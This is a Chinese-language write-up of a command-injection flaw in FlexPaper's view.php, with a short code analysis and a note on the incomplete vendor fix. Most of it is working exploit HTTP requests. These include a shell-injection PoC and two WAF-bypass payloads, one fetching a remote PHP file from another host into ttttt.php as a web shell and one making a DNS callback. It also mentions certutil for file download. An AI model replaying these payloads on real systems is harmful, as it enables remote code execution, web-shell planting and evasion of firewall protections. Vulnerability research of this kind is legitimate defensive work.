flexpaper 远程命令执行

这个是有POC的，先简单复现一下

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.docx"+%26+echo+shell+>+shel233l.txt+%23&page=exp&format=swf&callback=callback&isSplit=true HTTP/1.1
Host: 192.168.50.22
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

HTTP/1.1 200 OK
Date: Sat, 20 Apr 2024 05:06:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=ac0c7cfca1fd60eca686482c25af2a61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Accept-Ranges: bytes
Connection: close
Content-Type: application/x-shockwave-flash

简单分析

重要的函数就是trans_pdf2png , trans_pdftk ，也就是tool_transform.php 里面的几个函数，可以看到他从view.php中获取的数据直接传到这几个函数里去了，这几个函数在tool_transform.php

 把几个传入的参数拼接了，直接exec运行

也就是直接使用管道符隔开就能运行别的

修复？

看下官方是怎么修复的，直接把view.php删掉了

 

但是tool_transform.php没删

增加难度

分别加上了xx服的af和ct的雷池试下，绕过这两个设备得到了两个可行的poc（已提交给了他们的PM）

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||%22C%3A%5CProgram+Files+%28x86%29%5CTEC%5CWebServer%5Cphp%5Cphp.exe%22+-r+%22echo+file_get_contents%28%27http%3A%2F%2F192.168.10.248%2Fserver%2Fs.php%27%29%3B%22%20>>ttttt.php HTTP/1.1
Host: 192.168.10.197:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550
Connection: close

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||nslookup%20yafjjulyfe.dgrh3.cn  HTTP/1.1
Host: 192.168.10.197:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550
Connection: close

雷池还可以用certutil -urlcache -f直接下文件，如果两个套娃套起来，一时没想到该怎么弄，后面某服af升级之后直接正则了这个url，那也确实没有什么好的办法了